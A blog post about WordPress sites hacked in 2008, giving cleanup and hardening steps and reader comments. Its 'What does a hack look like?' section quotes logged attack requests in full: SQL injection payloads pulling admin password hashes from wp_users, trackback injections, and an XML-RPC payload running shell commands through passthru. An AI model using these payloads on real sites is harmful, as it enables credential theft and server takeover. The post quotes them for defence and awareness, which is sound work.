Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define(‘SECRET_KEY’, ‘1234567890’ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:

    < ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version=”1.0″?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Comments

comments

387 Replies to “Did your WordPress site get hacked?”

  1. What an excellent and well written post.

    I’ve been vulnerable and paid the price in the past. Thanks to articles such as this one I hope I’m a bit better protected these days.

    But they are clever bastards and trying to keep ahead of them is hard sometimes. I wonder just how many people don’t have the time (or indeed the knowledge) to find out how to protect themselves properly.

    It’d be great if WordPress could publish info such as this right on the front page, so that it’s brought to peoples attention more easily.

    Anyway, as I say, great post. Thanks for spending the time putting it out there for the rest of us.

  2. Umm… WordPress 2.5.0 and 2.5.1 appear to vulnerable to this attack. I’ve personally helped a couple of people that were taken down by this hack (the one that redirects to anyresults.net).

    Here is an example of someone dealing with it on 2.5.x:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    I’ve done some digging, and it appears to be pretty widespread. Lots of sites that I frequent are affected.

    The only other possibility that I can think of is that DreamHost has been compromised (I think many of these sites are on DH — could it be that they’ve gotten in and are attacking these installs from the inside?).

    1. Thank you much but I don’t even have a clu WHAT you said! Not computer or phone bright. My x just stole my identity and I had to go bankrupt! Thanks again! Going to sleep,?

  3. Thanks for the heads up on keymachine.de I keep seeing that one on a regular basis and have been tempted to just ban the whole domain, now I will!

  4. Good post, but as far as I remember, there is also a way to hide code only in the database, so it would take some time to detect and find it.

  5. Great post, Donncha. Thanks for clarifying exactly how these hacks work and underlining the importance of upgrading to the latest versions as soon as they’re available!

  6. Thanks for the warning, someone contacted me regarding this issue of Google link redirecting and I thought it was an anomaly and asked them to check again. The second time she checked, the link directed to the correct page. Does that mean the hacked code somehow got overwritten? Or does the link redirection happens once in every “x” clicks or something to that order? The WP version is 2.5.1. Any input will be highly appreciated!

  7. fivecentnickel.com – I think there’s a good chance they were compromised before they upgraded. So many sites were hijacked the previous time the hackers activated their payload that there was bound to be a second wave.

    It’s probably worth double checking even if your site doesn’t exhibit any of the redirect problems. I know I grepped all my installs just in case.

  8. Very good tips, a hack could be hard to be found but my guess you should always validate your feed.

    feedvalidator.org is a good tool you can you to take a look of what is being published and search for strange links, domains, etc..

  9. My blog got hacked. It makes me mad that the hackers can’t find a way to do something good with their skills rather than picking on innocent people.

    Thanks for a great post. I learned a lot!

  10. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    and thats exactly why cache should be outside of webroot, and almost everything else as well (plugins etc.) because guess where the next backdoor script is going to be placed..

    I host 9-10 wp blogs on a server, all running current. they have been hacked with 0day exploits 3 times in 6 months now. one of the blogs had so many pharma pages added to it that it was bringing the whole server to a crawl from the traffic.

  11. Here’s another tip: aside from checking file/directory permissions, make sure you don’t have obsolete JS directories/libraries lingering about. Much to my consternation I realized some “mysterious” pages were uploaded with an exploit of a JavaScript WYSIWYG (TinyMCE) editor. In my case, I did a full WP install refresh (just clearing out almost everything and uploaded a new set) as well as combing through all directories to find any suspect “additions” and that was the end of it.

  12. What’s the deal with the 2.3 and 2.5 branches of WordPress being plagued with security vulnerabilities??!! The older, (better, imo) WordPress 2.2.3 is not affected by any of the vulnerabilities discovered once these new versions were released.

    I believe this question deserves an answer from the WordPress developers. It’s as if security was completely thrown out the window with the release of 2.3.

  13. you are right xmlrpc.php exploit can be done easily with previous versions of wordpress, my blog was also atacked many times…
    However the latest upgrade resolve the issues, just a tip for other users make sure that you block IP’s through which attacks and spammers are coming that will really help you.
    Regards,
    Himanshu

  14. I was hacked a few months ago…unfortunately for the hacker, i hadn’t started working on my site yet (still haven’t actually :P). Thankfully it was nothing more than a kiddie playing with his computer. 10 minutes on my FTP and my site was back to normal. I made sure to delete EVERY file that had been uploaded and/or modified the day the hack happened. That made cleanup REALLY easy if anyone ever has this happen to them. I even too a screenshot of my site hacked 😀

    http://img241.imageshack.us/img241/5268/fuckxa9.png

  15. wow, thanks buddy, these tips really helped me a lot, i will now upgrade to latest version when ever its out 🙂 currently, Im on latest version, but I didnt upgrade for a long time until I noticed some bugs in older version..
    Thanks again

  16. Thank you so much this post. I upgranded to 2.5.1 the day it came out, but I’ve seen the attempts in WussUp and was not familiar with what they were trying to do, other than a vague suspicion it was probably malicious.

    I’ve heard from several other WP bloggers who’ve been hacked, and I will definitely be forwarding this post to them.

    Thanks again!

  17. Thank you SO MUCH for this article. I’ve definitely seen weird re-directs but I don’t know when they started since I rarely check my stats. Sigh. I don’t see any changed files and keep my server permissions rather tight (755 on directories and 644 on files) but something is wrong.

    At least with your article I have a starting point. I’m running 2.1.3 and got complacent….

  18. It only takes one time to learn. I got hacked two weeks ago before I upgraded and installed the security plugin. I haven’t had a problem since… just make sure ou leave the scanner activated, and keep a lookout for WP upgrades. Doesn’t 2.6 come out soon?

  19. Don’t forget to check the database for cruft left by the attacker if they do get in.

    During the April attacks, I had cleaned up the files that had been compromised, but they still got back in a week or so later because some of the options had been tampered with, and a WordPress upgrade to 2.5 didn’t fix it.

    Actually viewing the tables was the only way to see the hidden user they’d created… there was no way to see it from inside the WP admin panels.

  20. I can’t find any files which have changed, and I’m hoping this is due to the permissions I have set, so I can only assume they made some database additions. I have no idea how to check that out but I’m off to see what I can find.

  21. Ok, I’ve upgraded to 2.5.1. Thank you SO MUCH for this article. When I ran upgrade.php WP upgraded the database also. (shrug) I did find 2 users I didn’t know anything about and just deleted all my users, even my own id, leaving only admin and then changed the password.

    i hope that is enough and i don’t have to go into the database (scary).

Leave a Reply